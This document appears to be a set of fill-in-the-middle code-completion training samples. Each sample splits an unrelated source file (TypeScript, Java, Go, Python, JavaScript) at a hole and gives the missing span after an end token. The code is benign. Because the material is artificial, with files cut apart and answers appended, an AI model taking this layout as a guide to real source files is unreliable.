group.header.options.forEach((option)=>{
if (option.separator) {
$dropdown.append(OncoprintHeaderView.$makeDropdownSeparator());
} else {
$dropdown.append(OncoprintHeaderView.$makeDropdownOption(
option.label || "",
option.weight ? option.weight() : "normal",
option.disabled,
function(evt) {
evt.stopPropagation();<|fim▁hole|> populateDropdownOptions();
}
));
}
});
};
// add dropdown button
const $img = $("<img/>")
.appendTo($headerDiv)
.attr({
src: menuDotsIcon,
width:MENU_DOTS_SIZE,
height:MENU_DOTS_SIZE
})
.css({
cursor:"pointer",
border:"1px solid rgba(125,125,125,0)",
display:"inline-block"
})
.addClass(TOGGLE_BTN_CLASS).addClass(NTH_CLASS_PREFIX+(trackGroupIndex))
.on("click", (evt)=>{
evt.stopPropagation();
if ($dropdown.is(":visible")) {
$img.removeClass(TOGGLE_BTN_OPEN_CLASS);
$dropdown.fadeOut(FADE_MS);
} else {
populateDropdownOptions();
$dropdown.css('left', $img.offset().left);
$img.addClass(TOGGLE_BTN_OPEN_CLASS);
$dropdown.fadeIn(FADE_MS);
this.closeDropdownsExcept($dropdown);
}
});
}
$headerDiv.css({
position:"absolute",
top:headerTops[trackGroupIndex],
left:0,
width:"100%"
});
this.$occluded_ctr.append($headerDiv);
}
});
}
public setScroll(model:OncoprintModel) {
this.$occluded_ctr.css({
top:-model.getVertScroll()
});
this.$dropdowns_ctr.css({
top:-model.getVertScroll()
});
this.closeAllDropdowns();
}
public setVertScroll(model:OncoprintModel) {
this.setScroll(model);
}
public suppressRendering() {
this.rendering_suppressed = true;
}
public releaseRendering(model:OncoprintModel) {
this.rendering_suppressed = false;
this.render(model);
}
public toSVGGroup(model:OncoprintModel, offset_x:number, offset_y:number) {
const group = svgfactory.group((offset_x || 0), (offset_y || 0));
const trackGroups = model.getTrackGroups();
const headerTops = model.getZoomedHeaderTops();
trackGroups.forEach((trackGroup, index)=>{
const header = trackGroup.header;
if (header) {
const y = headerTops[index];
group.appendChild(svgfactory.text(
header.label.text,
0, y,
HEADER_FONT_SIZE,
"Arial",
"bold",
undefined,
undefined,
"underline"
))
}
});
return group;
}
}<|fim▁end|> | option.onClick && option.onClick(trackGroupIndex); |
<|file_name|>BaseSharedNewConcernImpl.java<|end_file_name|><|fim▁begin|>//#############################################################################
//# #
//# Copyright (C) <2014> <IMS MAXIMS> #
//# #
//# This program is free software: you can redistribute it and/or modify #
//# it under the terms of the GNU Affero General Public License as #
//# published by the Free Software Foundation, either version 3 of the #
//# License, or (at your option) any later version. #
//# #
//# This program is distributed in the hope that it will be useful, #
//# but WITHOUT ANY WARRANTY; without even the implied warranty of #
//# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
//# GNU Affero General Public License for more details. #
//# #
//# You should have received a copy of the GNU Affero General Public License #
//# along with this program. If not, see <http://www.gnu.org/licenses/>. #
//# #
//#############################################################################
//#EOH
// This code was generated by Barbara Worwood using IMS Development Environment (version 1.80 build 5007.25751)
// Copyright (C) 1995-2014 IMS MAXIMS. All rights reserved.
// WARNING: DO NOT MODIFY the content of this file
package ims.spinalinjuries.domain.base.impl;
<|fim▁hole|>import ims.domain.impl.DomainImpl;
public abstract class BaseSharedNewConcernImpl extends DomainImpl implements ims.spinalinjuries.domain.SharedNewConcern, ims.domain.impl.Transactional
{
private static final long serialVersionUID = 1L;
@SuppressWarnings("unused")
public void validatesaveConcern(ims.core.vo.PatientCurrentConcernVo concern, ims.core.vo.PatientShort patient)
{
}
@SuppressWarnings("unused")
public void validatelistHcps(ims.core.vo.HcpFilter filter)
{
}
@SuppressWarnings("unused")
public void validatelistProbsOnAdmission(ims.core.vo.CareContextShortVo coClinicalContactShort)
{
}
@SuppressWarnings("unused")
public void validategetConcern(ims.core.clinical.vo.PatientConcernRefVo concernId)
{
}
}<|fim▁end|> | |
<|file_name|>validate.go<|end_file_name|><|fim▁begin|>// Copyright ©2015 The gonum Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package functions
import (
"math"
"testing"
"gonum.org/v1/gonum/diff/fd"
"gonum.org/v1/gonum/floats"
)
// function represents an objective function.
type function interface {
Func(x []float64) float64
}
type gradient interface {
Grad(grad, x []float64)
}
// minimumer is an objective function that can also provide information about
// its minima.
type minimumer interface {
function
// Minima returns _known_ minima of the function.
Minima() []Minimum
}
// Minimum represents information about an optimal location of a function.
type Minimum struct {
// X is the location of the minimum. X may not be nil.
X []float64
// F is the value of the objective function at X.
F float64
// Global indicates if the location is a global minimum.<|fim▁hole|>}
type funcTest struct {
X []float64
// F is the expected function value at X.
F float64
// Gradient is the expected gradient at X. If nil, it is not evaluated.
Gradient []float64
}
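// Example (illustrative): a minimal test table for the sphere function
// f(x) = x1^2 + x2^2, whose gradient is 2x; the values are easy to check by
// hand, since f(1, 2) = 5 and grad f(1, 2) = (2, 4).
//
//	var sphereTests = []funcTest{
//		{X: []float64{1, 2}, F: 5, Gradient: []float64{2, 4}},
//	}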
// TODO(vladimir-ch): Decide and implement an exported testing function:
// func Test(f Function, ??? ) ??? {
// }
const (
defaultTol = 1e-12
defaultGradTol = 1e-9
defaultFDGradTol = 1e-5
)
// testFunction checks that the function can evaluate itself (and its gradient)
// correctly.
func testFunction(f function, ftests []funcTest, t *testing.T) {
// Make a copy of tests because we may append to the slice.
tests := make([]funcTest, len(ftests))
copy(tests, ftests)
// Get information about the function.
fMinima, isMinimumer := f.(minimumer)
fGradient, isGradient := f.(gradient)
// If the function is a Minimumer, append its minima to the tests.
if isMinimumer {
for _, minimum := range fMinima.Minima() {
// Allocate gradient only if the function can evaluate it.
var grad []float64
if isGradient {
grad = make([]float64, len(minimum.X))
}
tests = append(tests, funcTest{
X: minimum.X,
F: minimum.F,
Gradient: grad,
})
}
}
for i, test := range tests {
F := f.Func(test.X)
// Check that the function value is as expected.
if math.Abs(F-test.F) > defaultTol {
t.Errorf("Test #%d: function value given by Func is incorrect. Want: %v, Got: %v",
i, test.F, F)
}
if test.Gradient == nil {
continue
}
// Evaluate the finite difference gradient.
fdGrad := fd.Gradient(nil, f.Func, test.X, &fd.Settings{
Formula: fd.Central,
Step: 1e-6,
})
// Check that the finite difference and expected gradients match.
if !floats.EqualApprox(fdGrad, test.Gradient, defaultFDGradTol) {
dist := floats.Distance(fdGrad, test.Gradient, math.Inf(1))
t.Errorf("Test #%d: numerical and expected gradients do not match. |fdGrad - WantGrad|_∞ = %v",
i, dist)
}
// If the function is a Gradient, check that it computes the gradient correctly.
if isGradient {
grad := make([]float64, len(test.Gradient))
fGradient.Grad(grad, test.X)
if !floats.EqualApprox(grad, test.Gradient, defaultGradTol) {
dist := floats.Distance(grad, test.Gradient, math.Inf(1))
t.Errorf("Test #%d: gradient given by Grad is incorrect. |grad - WantGrad|_∞ = %v",
i, dist)
}
}
}
}<|fim▁end|> | Global bool |
<|file_name|>LevelBasedHierarchyImpl.java<|end_file_name|><|fim▁begin|>/**
* <copyright>
* </copyright>
*
* $Id$
*/
package orgomg.cwm.analysis.olap.impl;
import java.util.Collection;
import org.eclipse.emf.common.notify.NotificationChain;
import org.eclipse.emf.common.util.EList;
import org.eclipse.emf.ecore.EClass;
import org.eclipse.emf.ecore.InternalEObject;
import org.eclipse.emf.ecore.util.EObjectContainmentWithInverseEList;
import org.eclipse.emf.ecore.util.InternalEList;
import orgomg.cwm.analysis.olap.HierarchyLevelAssociation;
import orgomg.cwm.analysis.olap.LevelBasedHierarchy;
import orgomg.cwm.analysis.olap.OlapPackage;
/**
* <!-- begin-user-doc -->
* An implementation of the model object '<em><b>Level Based Hierarchy</b></em>'.
* <!-- end-user-doc -->
* <p>
* The following features are implemented:
* <ul>
* <li>{@link orgomg.cwm.analysis.olap.impl.LevelBasedHierarchyImpl#getHierarchyLevelAssociation <em>Hierarchy Level Association</em>}</li>
* </ul>
* </p>
*
* @generated
*/
public class LevelBasedHierarchyImpl extends HierarchyImpl implements LevelBasedHierarchy {
/**
* The cached value of the '{@link #getHierarchyLevelAssociation() <em>Hierarchy Level Association</em>}' containment reference list.
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @see #getHierarchyLevelAssociation()
* @generated
* @ordered
*/
protected EList<HierarchyLevelAssociation> hierarchyLevelAssociation;
/**
<|fim▁hole|> * <!-- end-user-doc -->
* @generated
*/
protected LevelBasedHierarchyImpl() {
super();
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
protected EClass eStaticClass() {
return OlapPackage.Literals.LEVEL_BASED_HIERARCHY;
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
public EList<HierarchyLevelAssociation> getHierarchyLevelAssociation() {
if (hierarchyLevelAssociation == null) {
hierarchyLevelAssociation = new EObjectContainmentWithInverseEList<HierarchyLevelAssociation>(HierarchyLevelAssociation.class, this, OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION, OlapPackage.HIERARCHY_LEVEL_ASSOCIATION__LEVEL_BASED_HIERARCHY);
}
return hierarchyLevelAssociation;
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@SuppressWarnings("unchecked")
@Override
public NotificationChain eInverseAdd(InternalEObject otherEnd, int featureID, NotificationChain msgs) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return ((InternalEList<InternalEObject>)(InternalEList<?>)getHierarchyLevelAssociation()).basicAdd(otherEnd, msgs);
}
return super.eInverseAdd(otherEnd, featureID, msgs);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public NotificationChain eInverseRemove(InternalEObject otherEnd, int featureID, NotificationChain msgs) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return ((InternalEList<?>)getHierarchyLevelAssociation()).basicRemove(otherEnd, msgs);
}
return super.eInverseRemove(otherEnd, featureID, msgs);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public Object eGet(int featureID, boolean resolve, boolean coreType) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return getHierarchyLevelAssociation();
}
return super.eGet(featureID, resolve, coreType);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@SuppressWarnings("unchecked")
@Override
public void eSet(int featureID, Object newValue) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
getHierarchyLevelAssociation().clear();
getHierarchyLevelAssociation().addAll((Collection<? extends HierarchyLevelAssociation>)newValue);
return;
}
super.eSet(featureID, newValue);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public void eUnset(int featureID) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
getHierarchyLevelAssociation().clear();
return;
}
super.eUnset(featureID);
}
/**
* <!-- begin-user-doc -->
* <!-- end-user-doc -->
* @generated
*/
@Override
public boolean eIsSet(int featureID) {
switch (featureID) {
case OlapPackage.LEVEL_BASED_HIERARCHY__HIERARCHY_LEVEL_ASSOCIATION:
return hierarchyLevelAssociation != null && !hierarchyLevelAssociation.isEmpty();
}
return super.eIsSet(featureID);
}
} //LevelBasedHierarchyImpl<|fim▁end|> | * <!-- begin-user-doc -->
|
<|file_name|>Mutex.java<|end_file_name|><|fim▁begin|>/*
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/*
* This file is available under and governed by the GNU General Public
* License version 2 only, as published by the Free Software Foundation.
* However, the following notice accompanied the original version of this
* file:
*
* Written by Doug Lea with assistance from members of JCP JSR-166
* Expert Group and released to the public domain, as explained at
* http://creativecommons.org/publicdomain/zero/1.0/
*/
import java.util.concurrent.TimeUnit;
import java.util.concurrent.locks.AbstractQueuedSynchronizer;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.atomic.AtomicInteger;
import java.io.IOException;
import java.io.ObjectInputStream;
/**
* A sample user extension of AbstractQueuedSynchronizer.
*/
public class Mutex implements Lock, java.io.Serializable {<|fim▁hole|>
public boolean tryAcquire(int acquires) {
assert acquires == 1; // Does not use multiple acquires
return compareAndSetState(0, 1);
}
public boolean tryRelease(int releases) {
setState(0);
return true;
}
Condition newCondition() { return new ConditionObject(); }
private void readObject(ObjectInputStream s) throws IOException, ClassNotFoundException {
s.defaultReadObject();
setState(0); // reset to unlocked state
}
}
private final Sync sync = new Sync();
public void lock() {
sync.acquire(1);
}
public boolean tryLock() {
return sync.tryAcquire(1);
}
public void lockInterruptibly() throws InterruptedException {
sync.acquireInterruptibly(1);
}
public boolean tryLock(long timeout, TimeUnit unit) throws InterruptedException {
return sync.tryAcquireNanos(1, unit.toNanos(timeout));
}
public void unlock() { sync.release(1); }
public Condition newCondition() { return sync.newCondition(); }
public boolean isLocked() { return sync.isHeldExclusively(); }
public boolean hasQueuedThreads() { return sync.hasQueuedThreads(); }
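    // Example (illustrative): typical usage of this Mutex as a plain lock.
    //   Mutex mutex = new Mutex();
    //   mutex.lock();
    //   try {
    //       // critical section
    //   } finally {
    //       mutex.unlock();
    //   }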
}<|fim▁end|> | private static class Sync extends AbstractQueuedSynchronizer {
public boolean isHeldExclusively() { return getState() == 1; } |
<|file_name|>base.py<|end_file_name|><|fim▁begin|># Copyright (C) 2018 Red Hat, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software<|fim▁hole|># under the License.
import copy
import io
import fixtures
import mock
from nova import conf
from nova.tests import fixtures as nova_fixtures
from nova.tests.fixtures import libvirt as fakelibvirt
from nova.tests.functional import integrated_helpers
CONF = conf.CONF
class ServersTestBase(integrated_helpers._IntegratedTestBase):
"""A libvirt-specific variant of the integrated test base."""
ADDITIONAL_FILTERS = []
def setUp(self):
self.flags(instances_path=self.useFixture(fixtures.TempDir()).path)
self.computes = {}
self.compute_rp_uuids = {}
super(ServersTestBase, self).setUp()
self.useFixture(nova_fixtures.LibvirtImageBackendFixture())
self.useFixture(nova_fixtures.LibvirtFixture())
self.useFixture(nova_fixtures.OSBrickFixture())
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.LibvirtDriver._create_image',
return_value=(False, False)))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.LibvirtDriver._get_local_gb_info',
return_value={'total': 128, 'used': 44, 'free': 84}))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.driver.libvirt_utils.is_valid_hostname',
return_value=True))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.driver.libvirt_utils.file_open',
side_effect=lambda *a, **k: io.BytesIO(b'')))
self.useFixture(fixtures.MockPatch(
'nova.privsep.utils.supports_direct_io',
return_value=True))
self.useFixture(fixtures.MockPatch(
'nova.virt.libvirt.host.Host.get_online_cpus',
return_value=set(range(16))))
# Mock the 'get_connection' function, as we're going to need to provide
# custom capabilities for each test
_p = mock.patch('nova.virt.libvirt.host.Host.get_connection')
self.mock_conn = _p.start()
self.addCleanup(_p.stop)
def _setup_compute_service(self):
# NOTE(stephenfin): We don't start the compute service here as we wish
# to configure the host capabilities first. We instead start the
# service in the test
self.flags(compute_driver='libvirt.LibvirtDriver')
def _setup_scheduler_service(self):
enabled_filters = CONF.filter_scheduler.enabled_filters
enabled_filters += self.ADDITIONAL_FILTERS
self.flags(enabled_filters=enabled_filters, group='filter_scheduler')
return self.start_service('scheduler')
def _get_connection(
self, host_info=None, pci_info=None, mdev_info=None, vdpa_info=None,
libvirt_version=None, qemu_version=None, hostname=None,
):
if not host_info:
host_info = fakelibvirt.HostInfo(
cpu_nodes=2, cpu_sockets=1, cpu_cores=2, cpu_threads=2)
# sanity check
self.assertGreater(16, host_info.cpus,
"Host.get_online_cpus is only accounting for 16 CPUs but you're "
"requesting %d; change the mock or your test" % host_info.cpus)
libvirt_version = libvirt_version or fakelibvirt.FAKE_LIBVIRT_VERSION
qemu_version = qemu_version or fakelibvirt.FAKE_QEMU_VERSION
fake_connection = fakelibvirt.Connection(
'qemu:///system',
version=libvirt_version,
hv_version=qemu_version,
host_info=host_info,
pci_info=pci_info,
mdev_info=mdev_info,
vdpa_info=vdpa_info,
hostname=hostname)
return fake_connection
def start_compute(
self, hostname='compute1', host_info=None, pci_info=None,
mdev_info=None, vdpa_info=None, libvirt_version=None,
qemu_version=None,
):
"""Start a compute service.
The started service will be saved in self.computes, keyed by hostname.
:param hostname: A hostname.
:param host_info: A fakelibvirt.HostInfo object for the host. Defaults
to a HostInfo with 2 NUMA nodes, 2 cores per node, 2 threads per
core, and 16GB of RAM.
:returns: The hostname of the created service, which can be used to
lookup the created service and UUID of the associated resource
provider.
"""
def _start_compute(hostname, host_info):
fake_connection = self._get_connection(
host_info, pci_info, mdev_info, vdpa_info, libvirt_version,
qemu_version, hostname,
)
# This is fun. Firstly we need to do a global'ish mock so we can
# actually start the service.
with mock.patch('nova.virt.libvirt.host.Host.get_connection',
return_value=fake_connection):
compute = self.start_service('compute', host=hostname)
# Once that's done, we need to tweak the compute "service" to
# make sure it returns unique objects. We do this inside the
# mock context to avoid a small window between the end of the
# context and the tweaking where get_connection would revert to
# being an autospec mock.
compute.driver._host.get_connection = lambda: fake_connection
return compute
# ensure we haven't already registered services with these hostnames
self.assertNotIn(hostname, self.computes)
self.assertNotIn(hostname, self.compute_rp_uuids)
self.computes[hostname] = _start_compute(hostname, host_info)
self.compute_rp_uuids[hostname] = self.placement.get(
'/resource_providers?name=%s' % hostname).body[
'resource_providers'][0]['uuid']
return hostname
class LibvirtMigrationMixin(object):
"""A simple mixin to facilliate successful libvirt live migrations
Requires that the test class set self.server for the specific test instnace
and self.{src,dest} to indicate the direction of the migration. For any
scenarios more complex than this they should override _migrate_stub with
their own implementation.
"""
def setUp(self):
super().setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.tests.fixtures.libvirt.Domain.migrateToURI3',
self._migrate_stub))
self.migrate_stub_ran = False
def _migrate_stub(self, domain, destination, params, flags):
self.dest.driver._host.get_connection().createXML(
params['destination_xml'],
'fake-createXML-doesnt-care-about-flags')
conn = self.src.driver._host.get_connection()
dom = conn.lookupByUUIDString(self.server['id'])
dom.complete_job()
self.migrate_stub_ran = True
class LibvirtNeutronFixture(nova_fixtures.NeutronFixture):
"""A custom variant of the stock neutron fixture with more networks.
There are three networks available: two l2 networks (one flat and one VLAN)
and one l3 network (VXLAN).
"""
network_1 = {
'id': '3cb9bc59-5699-4588-a4b1-b87f96708bc6',
'status': 'ACTIVE',
'subnets': [],
'name': 'physical-network-foo',
'admin_state_up': True,
'tenant_id': nova_fixtures.NeutronFixture.tenant_id,
'provider:physical_network': 'foo',
'provider:network_type': 'flat',
'provider:segmentation_id': None,
}
network_2 = network_1.copy()
network_2.update({
'id': 'a252b8cd-2d99-4e82-9a97-ec1217c496f5',
'name': 'physical-network-bar',
'provider:physical_network': 'bar',
'provider:network_type': 'vlan',
'provider:segmentation_id': 123,
})
network_3 = network_1.copy()
network_3.update({
'id': '877a79cc-295b-4b80-9606-092bf132931e',
'name': 'tunneled-network',
'provider:physical_network': None,
'provider:network_type': 'vxlan',
'provider:segmentation_id': 69,
})
network_4 = network_1.copy()
network_4.update({
'id': '1b70879f-fd00-411e-8ea9-143e7820e61d',
'name': 'private-network',
'shared': False,
'provider:physical_network': 'physnet4',
"provider:network_type": "vlan",
'provider:segmentation_id': 42,
})
subnet_1 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_1.update({
'name': 'physical-subnet-foo',
})
subnet_2 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_2.update({
'id': 'b4c13749-c002-47ed-bf42-8b1d44fa9ff2',
'name': 'physical-subnet-bar',
'network_id': network_2['id'],
})
subnet_3 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_3.update({
'id': '4dacb20b-917f-4275-aa75-825894553442',
'name': 'tunneled-subnet',
'network_id': network_3['id'],
})
subnet_4 = nova_fixtures.NeutronFixture.subnet_1.copy()
subnet_4.update({
'id': '7cb343ec-6637-494c-89a1-8890eab7788e',
'name': 'physical-subnet-bar',
'network_id': network_4['id'],
})
network_1['subnets'] = [subnet_1]
network_2['subnets'] = [subnet_2]
network_3['subnets'] = [subnet_3]
network_4['subnets'] = [subnet_4]
network_1_port_2 = {
'id': 'f32582b5-8694-4be8-9a52-c5732f601c9d',
'network_id': network_1['id'],
'status': 'ACTIVE',
'mac_address': '71:ce:c7:8b:cd:dc',
'fixed_ips': [
{
'ip_address': '192.168.1.10',
'subnet_id': subnet_1['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_1_port_3 = {
'id': '9c7580a0-8b01-41f3-ba07-a114709a4b74',
'network_id': network_1['id'],
'status': 'ACTIVE',
'mac_address': '71:ce:c7:2b:cd:dc',
'fixed_ips': [
{
'ip_address': '192.168.1.11',
'subnet_id': subnet_1['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_2_port_1 = {
'id': '67d36444-6353-40f5-9e92-59346cf0dfda',
'network_id': network_2['id'],
'status': 'ACTIVE',
'mac_address': 'd2:0b:fd:d7:89:9b',
'fixed_ips': [
{
'ip_address': '192.168.1.6',
'subnet_id': subnet_2['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_3_port_1 = {
'id': '4bfa1dc4-4354-4840-b0b4-f06196fa1344',
'network_id': network_3['id'],
'status': 'ACTIVE',
'mac_address': 'd2:0b:fd:99:89:9b',
'fixed_ips': [
{
'ip_address': '192.168.2.6',
'subnet_id': subnet_3['id']
}
],
'binding:vif_details': {},
'binding:vif_type': 'ovs',
'binding:vnic_type': 'normal',
}
network_4_port_1 = {
'id': 'b4cd0b93-2ac8-40a7-9fa4-2cd680ccdf3e',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ee',
'fixed_ips': [
{
'ip_address': '192.168.4.6',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
network_4_port_2 = {
'id': '4a0e3b05-4704-4adb-bfb1-f31f0e4d1bdc',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ef',
'fixed_ips': [
{
'ip_address': '192.168.4.7',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
network_4_port_3 = {
'id': 'fb2de1a1-d096-41be-9dbe-43066da64804',
'network_id': network_4['id'],
'status': 'ACTIVE',
'mac_address': 'b5:bc:2e:e7:51:ff',
'fixed_ips': [
{
'ip_address': '192.168.4.8',
'subnet_id': subnet_4['id']
}
],
'binding:vif_details': {'vlan': 42},
'binding:vif_type': 'hw_veb',
'binding:vnic_type': 'direct',
}
def __init__(self, test):
super(LibvirtNeutronFixture, self).__init__(test)
self._networks = {
self.network_1['id']: self.network_1,
self.network_2['id']: self.network_2,
self.network_3['id']: self.network_3,
self.network_4['id']: self.network_4,
}
self._net1_ports = [self.network_1_port_2, self.network_1_port_3]
def create_port(self, body=None):
network_id = body['port']['network_id']
assert network_id in self._networks, ('Network %s not in fixture' %
network_id)
if network_id == self.network_1['id']:
port = self._net1_ports.pop(0)
elif network_id == self.network_2['id']:
port = self.network_2_port_1
elif network_id == self.network_3['id']:
port = self.network_3_port_1
elif network_id == self.network_4['id']:
port = self.network_4_port_1
# this copy is here to avoid modifying class variables like
# network_2_port_1 below at the update call
port = copy.deepcopy(port)
port.update(body['port'])
# the tenant ID is normally extracted from credentials in the request
# and is not present in the body
if 'tenant_id' not in port:
port['tenant_id'] = nova_fixtures.NeutronFixture.tenant_id
# similarly, these attributes are set by neutron itself
port['admin_state_up'] = True
self._ports[port['id']] = port
# this copy is here as nova sometimes modifies the returned port
# locally, and we want to avoid nova modifying the fixture internals
return {'port': copy.deepcopy(port)}<|fim▁end|> | # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations |
<|file_name|>RuleBuilder.java<|end_file_name|><|fim▁begin|>/**
* Copyright 2016 William Van Woensel
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*
*
* @author wvw
*
*/
package wvw.utils.rule.builder;
public abstract class RuleBuilder {
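// Collects template and condition clauses; concrete subclasses render the final rule in toString().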
protected String id;
protected StringBuffer templateClause = new StringBuffer();
protected StringBuffer conditionClause = new StringBuffer();
public RuleBuilder() {
}
public RuleBuilder(String id) {
this.id = id;
}
public void appendTemplate(String template) {
templateClause.append("\t").append(template);
}
public void appendCondition(String condition) {
conditionClause.append("\t").append(condition);
}
<|fim▁hole|> }
public abstract String toString();
}<|fim▁end|> | public String getId() {
return id; |
<|file_name|>index.js<|end_file_name|><|fim▁begin|>var config = require('../config'),
mongoose = require('mongoose'),
fixtures = require('node-mongoose-fixtures'),
Q = require('q');
<|fim▁hole|>
defer.promise.then(function() {
console.log('Done');
process.exit(0);
});<|fim▁end|> | // Connect to database
mongoose.connect(config.mongo.uri, config.mongo.options);
var defer = Q.defer(); |
<|file_name|>EnqueueActivity.java<|end_file_name|><|fim▁begin|>package com.gmail.altakey.ray;
import android.app.Activity;
import android.os.Bundle;
import android.os.Parcelable;
import android.net.Uri;
import android.content.Intent;
import android.widget.Toast;
import android.util.Log;
import android.net.http.AndroidHttpClient;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.mime.content.FileBody;
import org.apache.http.entity.mime.MultipartEntity;
import org.apache.http.util.EntityUtils;
import java.io.File;
import java.io.IOException;
import java.util.Random;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.nio.channels.Channels;
import java.nio.channels.FileChannel;
import java.nio.channels.ReadableByteChannel;
import java.nio.*;
import android.os.AsyncTask;
import android.view.View;
import android.view.ViewGroup;
import android.view.LayoutInflater;
import android.widget.EditText;
import android.app.AlertDialog;
import android.content.DialogInterface;
import java.util.*;
public class EnqueueActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
final String action = getIntent().getAction();
final Bundle extras = getIntent().getExtras();
if (Intent.ACTION_SEND.equals(action)) {
if (extras.containsKey(Intent.EXTRA_STREAM)) {
new EnqueueTaskInvoker((Uri)extras.getParcelable(Intent.EXTRA_STREAM)).invokeOnFriend();
}
} else if (Intent.ACTION_SEND_MULTIPLE.equals(action)) {
if (extras.containsKey(Intent.EXTRA_STREAM)) {
for (Parcelable p : extras.getParcelableArrayList(Intent.EXTRA_STREAM)) {
new EnqueueTaskInvoker((Uri)p).invokeOnFriend();
}
}
} else {
finish();
}
}
private class EnqueueTaskInvoker {
private Uri mmForUri;
private List<String> mmOptions = new LinkedList<String>();
public EnqueueTaskInvoker(Uri forUri) {
mmForUri = forUri;
mmOptions.add("(local)");
mmOptions.add("10.0.0.50");
mmOptions.add("10.0.0.52");
mmOptions.add("192.168.1.15");
mmOptions.add("192.168.1.17");
mmOptions.add("Other...");
}
public void invokeOnFriend() {
AlertDialog.Builder builder = new AlertDialog.Builder(EnqueueActivity.this);
builder
.setTitle(R.string.dialog_title_send_to)
.setOnCancelListener(new CancelAction())
.setItems(mmOptions.toArray(new String[0]), new DialogInterface.OnClickListener() {
@Override
public void onClick(DialogInterface dialog, int which) {
String choice = mmOptions.get(which);
if (choice != null) {
if ("Other...".equals(choice)) {
LayoutInflater inflater = getLayoutInflater();
View layout = inflater.inflate(
R.layout.friend,
(ViewGroup)findViewById(R.id.root));
AlertDialog.Builder builder = new AlertDialog.Builder(EnqueueActivity.this);
EditText field = (EditText)layout.findViewById(R.id.name);
builder
.setTitle(R.string.dialog_title_send_to)
.setView(layout)
.setOnCancelListener(new CancelAction())
.setNegativeButton(android.R.string.cancel, new CancelAction())
.setPositiveButton(android.R.string.ok, new ConfirmAction(field));
dialog.dismiss();
builder.create().show();
} else if ("(local)".equals(choice)) {
dialog.dismiss();
new EnqueueToFriendTask("localhost:8080", mmForUri).execute();
finish();
} else {
dialog.dismiss();
new EnqueueToFriendTask(String.format("%s:8080", choice), mmForUri).execute();
finish();
}
} else {
dialog.dismiss();
}
}
});
builder.create().show();
}
